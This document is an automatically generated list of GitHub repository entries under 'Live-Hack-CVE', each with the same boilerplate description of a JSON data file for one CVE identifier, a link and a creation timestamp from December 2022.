**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35414 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35414](https://github.com/Live-Hack-CVE/CVE-2022-35414) create time: 2022-12-23T03:13:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25763 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25763](https://github.com/Live-Hack-CVE/CVE-2022-25763) create time: 2022-12-23T03:13:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1919 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1919](https://github.com/Live-Hack-CVE/CVE-2022-1919) create time: 2022-12-23T03:13:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30292 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30292](https://github.com/Live-Hack-CVE/CVE-2022-30292) create time: 2022-12-23T03:12:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23858 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23858](https://github.com/Live-Hack-CVE/CVE-2022-23858) create time: 2022-12-23T03:12:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21970 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21970](https://github.com/Live-Hack-CVE/CVE-2022-21970) create time: 2022-12-23T03:12:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-4244 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-4244](https://github.com/Live-Hack-CVE/CVE-2012-4244) create time: 2022-12-23T02:25:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4271 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4271](https://github.com/Live-Hack-CVE/CVE-2019-4271) create time: 2022-12-23T02:27:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4270 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4270](https://github.com/Live-Hack-CVE/CVE-2019-4270) create time: 2022-12-23T02:27:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4141 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4141](https://github.com/Live-Hack-CVE/CVE-2019-4141) create time: 2022-12-23T02:26:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4280 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4280](https://github.com/Live-Hack-CVE/CVE-2019-4280) create time: 2022-12-23T02:26:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4147 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4147](https://github.com/Live-Hack-CVE/CVE-2019-4147) create time: 2022-12-23T02:26:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4186 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4186](https://github.com/Live-Hack-CVE/CVE-2019-4186) create time: 2022-12-23T02:26:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4171 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4171](https://github.com/Live-Hack-CVE/CVE-2019-4171) create time: 2022-12-23T02:26:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4175 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4175](https://github.com/Live-Hack-CVE/CVE-2019-4175) create time: 2022-12-23T02:26:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4268 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4268](https://github.com/Live-Hack-CVE/CVE-2019-4268) create time: 2022-12-23T02:26:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4267 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4267](https://github.com/Live-Hack-CVE/CVE-2019-4267) create time: 2022-12-23T02:25:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4194 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4194](https://github.com/Live-Hack-CVE/CVE-2019-4194) create time: 2022-12-23T02:25:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4163 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4163](https://github.com/Live-Hack-CVE/CVE-2019-4163) create time: 2022-12-23T02:25:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4284 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4284](https://github.com/Live-Hack-CVE/CVE-2019-4284) create time: 2022-12-23T02:25:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4275 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4275](https://github.com/Live-Hack-CVE/CVE-2019-4275) create time: 2022-12-23T02:25:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4073 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4073](https://github.com/Live-Hack-CVE/CVE-2019-4073) create time: 2022-12-23T02:25:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4074 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4074](https://github.com/Live-Hack-CVE/CVE-2019-4074) create time: 2022-12-23T02:24:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4294 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4294](https://github.com/Live-Hack-CVE/CVE-2019-4294) create time: 2022-12-23T02:24:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4149 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4149](https://github.com/Live-Hack-CVE/CVE-2019-4149) create time: 2022-12-23T02:24:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4169 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4169](https://github.com/Live-Hack-CVE/CVE-2019-4169) create time: 2022-12-23T02:24:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4167 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4167](https://github.com/Live-Hack-CVE/CVE-2019-4167) create time: 2022-12-23T02:24:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25691 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25691](https://github.com/Live-Hack-CVE/CVE-2020-25691) create time: 2022-12-23T02:23:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36609 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36609](https://github.com/Live-Hack-CVE/CVE-2020-36609) create time: 2022-12-23T02:21:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36610 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36610](https://github.com/Live-Hack-CVE/CVE-2020-36610) create time: 2022-12-23T02:21:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16587 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16587](https://github.com/Live-Hack-CVE/CVE-2020-16587) create time: 2022-12-23T01:47:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16589 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16589](https://github.com/Live-Hack-CVE/CVE-2020-16589) create time: 2022-12-23T01:47:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16588 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16588](https://github.com/Live-Hack-CVE/CVE-2020-16588) create time: 2022-12-23T01:47:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36565 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36565](https://github.com/Live-Hack-CVE/CVE-2020-36565) create time: 2022-12-23T01:46:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25095 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25095](https://github.com/Live-Hack-CVE/CVE-2021-25095) create time: 2022-12-23T02:26:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29969 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29969](https://github.com/Live-Hack-CVE/CVE-2021-29969) create time: 2022-12-23T02:26:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29970 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29970](https://github.com/Live-Hack-CVE/CVE-2021-29970) create time: 2022-12-23T02:26:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29976 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29976](https://github.com/Live-Hack-CVE/CVE-2021-29976) create time: 2022-12-23T02:25:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29980 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29980](https://github.com/Live-Hack-CVE/CVE-2021-29980) create time: 2022-12-23T02:25:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29984 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29984](https://github.com/Live-Hack-CVE/CVE-2021-29984) create time: 2022-12-23T02:25:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29985 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29985](https://github.com/Live-Hack-CVE/CVE-2021-29985) create time: 2022-12-23T02:25:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29988 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29988](https://github.com/Live-Hack-CVE/CVE-2021-29988) create time: 2022-12-23T02:25:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3996 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3996](https://github.com/Live-Hack-CVE/CVE-2021-3996) create time: 2022-12-23T02:25:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3995 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3995](https://github.com/Live-Hack-CVE/CVE-2021-3995) create time: 2022-12-23T02:25:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29986 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29986](https://github.com/Live-Hack-CVE/CVE-2021-29986) create time: 2022-12-23T02:24:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29989 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29989](https://github.com/Live-Hack-CVE/CVE-2021-29989) create time: 2022-12-23T02:24:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38492 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38492](https://github.com/Live-Hack-CVE/CVE-2021-38492) create time: 2022-12-23T02:24:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38493 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38493](https://github.com/Live-Hack-CVE/CVE-2021-38493) create time: 2022-12-23T02:24:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38495 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38495](https://github.com/Live-Hack-CVE/CVE-2021-38495) create time: 2022-12-23T02:24:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43546 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43546](https://github.com/Live-Hack-CVE/CVE-2021-43546) create time: 2022-12-23T02:24:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3474 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3474](https://github.com/Live-Hack-CVE/CVE-2021-3474) create time: 2022-12-23T01:47:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3475 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3475](https://github.com/Live-Hack-CVE/CVE-2021-3475) create time: 2022-12-23T01:47:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3476 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3476](https://github.com/Live-Hack-CVE/CVE-2021-3476) create time: 2022-12-23T01:47:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-26260 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-26260](https://github.com/Live-Hack-CVE/CVE-2021-26260) create time: 2022-12-23T01:47:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23215 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23215](https://github.com/Live-Hack-CVE/CVE-2021-23215) create time: 2022-12-23T01:47:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3598 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3598](https://github.com/Live-Hack-CVE/CVE-2021-3598) create time: 2022-12-23T01:47:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3605 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3605](https://github.com/Live-Hack-CVE/CVE-2021-3605) create time: 2022-12-23T01:47:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45942 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45942](https://github.com/Live-Hack-CVE/CVE-2021-45942) create time: 2022-12-23T01:47:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3941 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3941](https://github.com/Live-Hack-CVE/CVE-2021-3941) create time: 2022-12-23T01:47:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3933 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3933](https://github.com/Live-Hack-CVE/CVE-2021-3933) create time: 2022-12-23T01:46:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3942 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3942](https://github.com/Live-Hack-CVE/CVE-2021-3942) create time: 2022-12-23T01:46:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40297 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40297](https://github.com/Live-Hack-CVE/CVE-2022-40297) create time: 2022-12-23T02:27:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42324 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42324](https://github.com/Live-Hack-CVE/CVE-2022-42324) create time: 2022-12-23T02:26:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33747 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33747](https://github.com/Live-Hack-CVE/CVE-2022-33747) create time: 2022-12-23T02:26:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31176 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31176](https://github.com/Live-Hack-CVE/CVE-2022-31176) create time: 2022-12-23T02:25:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28605 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28605](https://github.com/Live-Hack-CVE/CVE-2022-28605) create time: 2022-12-23T02:24:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29776 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29776](https://github.com/Live-Hack-CVE/CVE-2022-29776) create time: 2022-12-23T02:24:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29777 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29777](https://github.com/Live-Hack-CVE/CVE-2022-29777) create time: 2022-12-23T02:23:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28799 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28799](https://github.com/Live-Hack-CVE/CVE-2022-28799) create time: 2022-12-23T02:23:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31783 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31783](https://github.com/Live-Hack-CVE/CVE-2022-31783) create time: 2022-12-23T02:23:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-0847 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-0847](https://github.com/Live-Hack-CVE/CVE-2022-0847) create time: 2022-12-23T02:23:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3024 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3024](https://github.com/Live-Hack-CVE/CVE-2022-3024) create time: 2022-12-23T02:23:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37988 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37988](https://github.com/Live-Hack-CVE/CVE-2022-37988) create time: 2022-12-23T02:23:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3092 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3092](https://github.com/Live-Hack-CVE/CVE-2022-3092) create time: 2022-12-23T02:23:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2952 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2952](https://github.com/Live-Hack-CVE/CVE-2022-2952) create time: 2022-12-23T02:23:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2948 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2948](https://github.com/Live-Hack-CVE/CVE-2022-2948) create time: 2022-12-23T02:23:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2002 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2002](https://github.com/Live-Hack-CVE/CVE-2022-2002) create time: 2022-12-23T02:23:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3084 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3084](https://github.com/Live-Hack-CVE/CVE-2022-3084) create time: 2022-12-23T02:23:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43464 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43464](https://github.com/Live-Hack-CVE/CVE-2022-43464) create time: 2022-12-23T02:22:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44606 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44606](https://github.com/Live-Hack-CVE/CVE-2022-44606) create time: 2022-12-23T02:22:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44620 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44620](https://github.com/Live-Hack-CVE/CVE-2022-44620) create time: 2022-12-23T02:22:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39897 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39897](https://github.com/Live-Hack-CVE/CVE-2022-39897) create time: 2022-12-23T02:22:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39896 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39896](https://github.com/Live-Hack-CVE/CVE-2022-39896) create time: 2022-12-23T02:22:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39895 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39895](https://github.com/Live-Hack-CVE/CVE-2022-39895) create time: 2022-12-23T02:22:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39894 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39894](https://github.com/Live-Hack-CVE/CVE-2022-39894) create time: 2022-12-23T02:22:39Z

